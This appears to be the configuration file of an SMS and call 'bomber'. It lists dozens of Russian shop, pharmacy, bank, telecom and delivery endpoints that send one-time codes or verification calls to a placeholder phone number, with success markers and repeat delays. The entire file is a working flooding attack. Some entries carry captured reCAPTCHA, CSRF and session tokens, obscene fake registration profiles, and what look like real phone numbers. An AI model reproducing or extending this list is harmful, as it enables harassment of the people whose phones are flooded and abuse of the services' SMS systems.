smsServices:
# ----------------
# TEST "SERVICE"
# - url: 'https://httpbin.org/post'
#   method: 'POST'
#   headers:
#     Content-Type: 'application/json'
#   body: '{"phone_number":"<num>"}'
#   okRes: 'origin'
#   delay: 5
# ----------------

- url: 'https://apteka366.ru/login/register/sms/send'
  method: 'POST'
  body: 'phone=<num2>'
  okRes: '{"phone":"'
  delay: 121

- url: 'https://i.api.kari.com/ecommerce/client/registration/verify/phone/code?phone=+<num>'
  method: 'POST'
  body: 'phone=%2B<num>'
  okRes: 'READY_FOR_REGISTER'
  delay: 63

- url: 'https://belkacar.ru/get-confirmation-code'
  method: 'POST'
  body: 'phone=<num>'
  okRes: 'success":true'
  delay: 61

- url: 'https://drugvokrug.ru/siteActions/processSms.htm'
  method: 'POST'
  body: 'cell=<num>'
  okRes: 'success":true'
  delay: 7

- url: 'https://www.gloria-jeans.ru/phone-verification/send-code/registration'
  method: 'POST'
  headers:
    Content-Type: 'application/json'
  body: '{"phoneNumber":"+<num>"}'
  okRes: '{"status":"SUCCESS","errorMessage":null,"phoneVerificationCodeInfo":{"phoneNumber":"+<num>","timeInterval":90,"confirmationAttempts":0,"maxConfirmationAttempts":5,"tryNumber":1,"totalTryNumber":6}}'
  delay: 63

- url: 'https://lenta.com/api/v1/registration/requestValidationCode'
  method: 'POST'
  headers:
    Content-Type: 'application/json'
  body: '{"phone":"<num3>"}'
  okRes: '{"phoneNumber":"<num>","nextTryAllowedAt":"2021-10-21T19:35:59Z"}'
  delay: 63

- url: 'ttps://passport.yandex.ru/registration-validations/phone-confirm-code-submit'
  method: 'POST'
  headers:
  body: 'track_id=f8a5c9e78c0f7e89193f2365cab271b22c&csrf_token=b82cbf14df583a77db616be1c8575b9f0f05048f%3A1634845180360&display_language=ru&number=<num>&confirm_method=by_sms&isCodeWithFormat=true'
  okRes: '{"phoneNumber":"","nextTryAllowedAt":"2021-10-21T19:35:59Z"}'
  delay: 63

- url: 'https://api.eapteka.ru/api/v3/user'
  method: 'POST'
  headers:
    Content-Type: 'application/json'
  body: '{"phone":"+<num3>","force_sms":true}'
  okRes: ''
  delay: 63

- url: 'https://www.okeydostavka.ru/wcs/resources/mobihub023/store/13159/loyalty/profile/profile'
  method: 'POST'
  headers:
    Content-Type: 'application/json'
  body: '{"profile":{"firstName":"Писос","lastName":"Дебил","email":"mymail@mail.com","phone":"<num>","birthday":"1955-01-01","middleName":"Соси","genderCode":"1","password":"psq1111111111","allowPersonalDataProcessing":"true","allowEmail":"true","allowSms":"true","allowEReciept":"true"}}'
  okRes: ''
  delay: 63

- url: 'https://api.metro-cc.ru/auth/api/v1/public/send_otp'
  method: 'POST'
  headers:
    Content-Type: 'application/json'
  body: '{"phone":"<num>"}'
  okRes: '{"result":"success"}'
  delay: 63

- url: 'https://lkk.verno-info.ru/#/reset-password'
  method: 'POST'
  headers:
    Content-Type: 'application/json'
  body: '{"notifierIdentity":"<num>"}'
  okRes: '{
  "data": {
    "codeLength": 6
  },
  "result": {
    "state": "Success",
    "message": "Код подтверждения отправлен на указанное средство оповещения.",
    "messageCode": null,
    "exception": null,
    "validationErrors": null
  }
}'
  delay: 1

- url: 'https://www.kfc.ru/api/account/verify'
  method: 'POST'
  headers:
    Content-Type: 'application/json'
  body: '{"phone":"+7 <num2>","g-recaptcha-response":"03AGdBq26UG2S2ss2CP6CGyYtrM4B0J2MtKfq5oCmJMMnQ7rul2mJsVCuCrQRerqX43Sgw4xFnyl5B9Lm68YcCMOu44gbURdih_zCx2Fu1whwmAE2RJ2XEWs3ymb1mCv5QIuElXH2OHAIZflBZEm6yRl27Hp2eigiK5Lrf4P_55u_nHsVGl18XDiQc-yNj3n9yYF3yJHwaCp-lvgfH7FcT7bGDimziZieTmzzpmLcfkpBIcCHO-VQJ5a9z8VRO0knzjbsqNHLEl46XNDY2AOreL0MGaweV2Ep6hqh-QilMS6w8PkrQu8o77ne4NeJoTS1QZD0U0yCZW8RsbAC2rcKOH7zMpaB0A1-v_HM4QpniCcYF6yWehllFAxDw4yP0gOOod2dFyjS_FUaY74lUKkBU7F0HHOhFZocV2dPyKJh_HAagJawmQZSjwSclYqXd-Uqeeds1SAdK3ATEOeMm7qSvwFEtKEg-ROnZaHNCVs8so7E4cQik5bgQhDNhF0nzarhdL-4IoOerL6_l"}'
  okRes: '{"status":0}'
  delay: 63

- url: 'https://site-api.mcdonalds.ru/api/v1/user/login/phone'
  method: 'POST'
  headers:
    Content-Type: 'application/json'
  body: '{"number":"+<num>","g-recaptcha-response":"03AGdBq25fCO2oHw2TSEp5WZc91mGXJE74Gce6Zd-gAucDEN9GwrQZykCd1xdsJICfHAp9jqpbPGT5UnXZwk6T3z_MJ2IGEv5zD40w3SR-7q8UVCfxmGiDyaWD86fTQX4IfTLNcEyBsejb2-NKB3q6yC4eVwipNtZFFan5fxDMTGeZCsdGTPHfjk1RDpdV4fWnHajLgQ4xjVJA_Dc8mlHZxeu7uBprq8npd4_zRAUxfWnU_JTzek3zIUpIFKftg7ufmVzUbnQPviO8l2wptElEclFyd8-GoPJGnBuprLkpt-JtFa2NJKmkmLnV2LU-7HGrZkXv8yFOFKsJKRnWGpJxOQYmh-lBxMAme8v0S7m98UG_dSf4KHUUvf-ZqsRvs-Sd0HHLlB7oEZkmGeIbJkNtgz46KEgcw0kEdennTfyCOaP_d7MwWlklETHMcFSY7vn62ZcYvZbrS55FOVyT6L-eLQfyHnI5dOz8d0km0BKB_TJDnH6-CjdGwgE9SZQqjxuBEyfeQjeyDmLH"}'
  okRes: ''
  delay: 32

- url: 'https://www.eldorado.ru/_ajax/spa/auth/v2/auth_with_login.php'
  method: 'POST'
  headers:
    Content-Type: 'application/json'
  body: '{"user_login":"<num4>"}'
  okRes: '{"backurl":"\/index.php?login=yes","success":false,"data":false,"status":10,"captcha":0}'
  delay: 63

- url: 'https://admin.taxovichkof.ru/api/account/get_password'
  method: 'POST'
  headers:
    Content-Type: 'application/json'
  body: '{"user_phone":"+7 <num>"}'
  okRes: '{"success":true,"message":"\u041f\u0430\u0440\u043e\u043b\u044c \u043e\u0442\u043f\u0440\u0430\u0432\u043b\u0435\u043d \u043d\u0430 \u0443\u043a\u0430\u0437\u0430\u043d\u044b\u0439 \u043d\u043e\u043c\u0435\u0440 \u0442\u0435\u043b\u0435\u0444\u043e\u043d\u0430!"}'
  delay: 63

- url: 'https://my.modulbank.ru/api/v2/auth/phone'
  method: 'POST'
  headers:
    Content-Type: 'application/json'
  body: '{"CellPhone":"<num2>"}'
  okRes: '{"RequestId":"27061677-355f-4c37-81fd-aa5cd96be0f1","AuthStatus":"NotConnected"}'
  delay: 33

- url: 'https://burgerking.ru/middleware/bridge/api/v3/auth/login'
  method: 'POST'
  headers:
    Content-Type: 'application/json'
  body: '{"phone":"<num>"}'
  okRes: ''
  delay: 63

- url: 'https://3332222.ru/phone/va11date'
  method: 'POST'
  headers:
    Content-Type: 'application/json'
  body: '{"phone":"+<num3>"}'
  okRes: '{"result":"success","message":"Code sended"}'
  delay: 63

- url: 'https://yfe.dominospizza.ru/api/authentication/sendVerificationSms?phoneNumber=<num2>'
  method: 'POST'
  headers:
  body: 'phoneNumber=<num2>'
  okRes: '{"status":"Success","data":true}'
  delay: 63

- url: 'https://passport.pochta.ru/pc/ext/v2.0/signUp/phone/request'
  method: 'POST'
  headers:
    Content-Type: 'application/json'
  body: '{"phone":"+<num>","resend":false,"display":"page","dm":"l"}'
  okRes: '{"status":"OK","codeLength":"5","uid":"XSh6FPjgXiwIe71FWhefP1gLpoS9cPHHlBltfxkgy0EW2TTBWx","formattedPhone":"+<num7>"}'
  delay: 63

- url: 'https://www.cdek.ru/graphql'
  method: 'POST'
  headers:
    Content-Type: 'application/json'
  body: '{"operationName":"SendCode","variables":{"input":{"locale":"ru","websiteId":"ru","phone":"+<num>","token":null}},"query":"mutation SendCode($input: CdekIdLoginInputPhone) {\n  SendCode(input: $input) {\n    success\n    data\n    errors {\n      message\n      code\n      __typename\n    }\n    __typename\n  }\n}\n"}'
  okRes: '{"data":{"SendCode":{"success":true,"data":"4271a501-2810-437c-9d9d-559025ab677e","errors":null,"__typename":"CdekIdLogin"}}}'
  delay: 63

- url: 'https://api.apteka.ru/Auth/Auth_Code?cityId=5e57803249af4c0001d64407'
  method: 'POST'
  headers:
    Content-Type: 'application/json'
  body: '{"phone":"+<num3>","u":"U"}'
  okRes: '{"nextAttemptDelayMs":120000,"newUser":true}'
  delay: 121

- url: 'https://vitaexpress.ru/mindbox/ajax/check-phone.php?phone=<num2>'
  method: 'GET'
  okRes: 'NULL'
  delay: 63

- url: 'https://web-api.apteka-april.ru/users'
  method: 'POST'
  headers:
    Content-Type: 'application/json'
  body: '{"phone":<num>,"password":"pswhueglot111","name":"Дебил","sname":"Дебилов","email":"hueglottus@yandex.ru"}'
  okRes: '{"timeout":30}'
  delay: 31

- url: 'https://www.asna.ru/api/v1/connect/authorize/'
  method: 'POST'
  headers:
    Content-Type: 'application/json'
  body: '{"data":{"attributes":{"code":null,"phone":"+<num>"},"type":"user"}}'
  okRes: ''
  delay: 63

- url: 'https://zdravcity.ru/ajax/sendcode.php'
  method: 'POST'
  body: 'phone=<num2>&bxsid=1c960113a3e74a83d7a3474d9c3ea0fc&sms1=Y&typeAction=regUser'
  okRes: '{"success":"Y","message":"\u041f\u0430\u0440\u043e\u043b\u044c \u0432\u044b\u0441\u043b\u0430\u043d \u043d\u0430 \u0443\u043a\u0430\u0437\u0430\u043d\u043d\u044b\u0439 \u043d\u043e\u043c\u0435\u0440 \u0442\u0435\u043b\u0435\u0444\u043e\u043d\u0430"}'
  delay: 10

- url: 'https://zdesapteka.ru/ajax/smsfastconfirmation.php'
  method: 'POST'
  body: 'sessid=500bbd36265dcb53d002926e3d69c14f&phoneNumber=+<num3>'
  okRes: 'OK - 1 SMS, ID - 19103982'
  delay: 63

- url: 'https://zhivika.ru/auth/sms'
  method: 'POST'
  body: 'phone=+<num3>'
  okRes: '{"success":true,"data":[]}'
  delay: 61

- url: 'https://spb.tele2.ru/api/validation/number/<num>'
  method: 'POST'
  headers:
    Content-Type: 'application/json'
  body: '{"sender":"Tele2"}'
  okRes: ''
  delay: 61

- url: 'https://lk.megafon.ru/api/auth/otp/request?CSRF=439d1b41-a077-46be-ab72-3000c69e6631'
  method: 'POST'
  body: 'login=9110031184&captcha=&captchaReady=true'
  okRes: '{"ok":true,"codeLength":6,"timeout":0}'
  delay: 61

- url: 'https://eda.yandex/api/v1/user/request_authentication_code'
  method: 'POST'
  headers:
    Content-Type: 'application/json'
  body: '{"phone_number":"<num2>"}'
  okRes: '"delay"'
  delay: 61

- url: 'https://youla.ru/web-api/auth/request_code'
  method: 'POST'
  body: 'phone=<num>'
  okRes: '"phone"'
  delay: 16

- url: 'https://www.citilink.ru/registration/confirm/phone/+<num>/'
  method: 'POST'
  body: ''
  okRes: '"smsRequestToken":'
  delay: 61


callServices:
- url: 'https://findclone.ru/register?phone=+<num>'
  method: 'GET'
  okRes: '"pin_size"'
  delay: 61

- url: 'https://client.taximaxim.com/ru-RU/site/send-code/'
  method: 'POST'
  headers:
  body: '_csrf=t0T20Uzq6471RBB6Yvfj-mMGFDWWHPGKgGpIRGH3pTCAHYWyfqGe6YFpIxhUkbGXIXJdcs9EmPDoOz4xJ87sfQ%3D%3D&LoginForm%5Borg%5D=maxim&LoginForm%5Bcountry%5D=RU&LoginForm%5BbaseId%5D=133&LoginForm%5BsendCodeType%5D=2&LoginForm%5Bphone%5D=%2B<num9>&LoginForm%5Bagree%5D=1'
  okRes: '{"success":true,"message":"Звоним...\r\nПоследние 4 цифры номера телефона поступившего звонка нужно ввести в поле «Код».","data":{"message":"Звоним...\r\nПоследние 4 цифры номера телефона поступившего звонка нужно ввести в поле «Код».","success":true,"nextTryInSeconds":60},"errors":[],"rateLimited":null}'
  delay: 61

- url: 'https://aloeapteka.ru/ajax/check_phone_auth.php'
  method: 'POST'
  headers:
  body: 'token=03AGdBq2525DCMm-TA93AutsOlOh3K_OCOWP3itBJddjAzAJwsYHXImUTNCWvIIg7yhNksbV5IQrHjprO-0KhR__4LgvgcOmCewHXV421NUPIax5p9bjY5XCCSll9sJg4IZhom1cZ18nc64mArvc8xgDfggDopWfCyONzoM79AKC2I29JuMtmiB08-KgjP8NG8R64tijynjTwBz4zsIbmKLxEIJ6SzWW_K0hgLJRP3XaT47RkP4cAKXyUp0PRar-By3vbv81hqqOVwZuA4G4FwMrdYD2bj8CQPUueRZorMQcEGul4p4rOaJ6qJDxwvMIQSwBJ1EbjOgAp8Kw9EISmGTL9nD5hMq7NhREx6j-18KUXRJpYRBQgfVjjzCsws1vtu0764BNBycrEVbKdR1E19naz8u99P_01_kCxRZ6RNwmI-yB8up97aKOkPLDZxYUJ0ItdgqSB9xfEKT0uA3-DQ-xl-N4F6rdLB0OfsMBXDG-cL442R0Sk50Rmn4tcOiwMTQj91ohpVldvP&action=form_send&phone=+<num3>&agree=1'
  okRes: '{"is_client":false,"expire":1634929722,"next_try":60,"phone":"+7 (911) 487-48-32","confirm_way":"call","success":1}'
  delay: 63
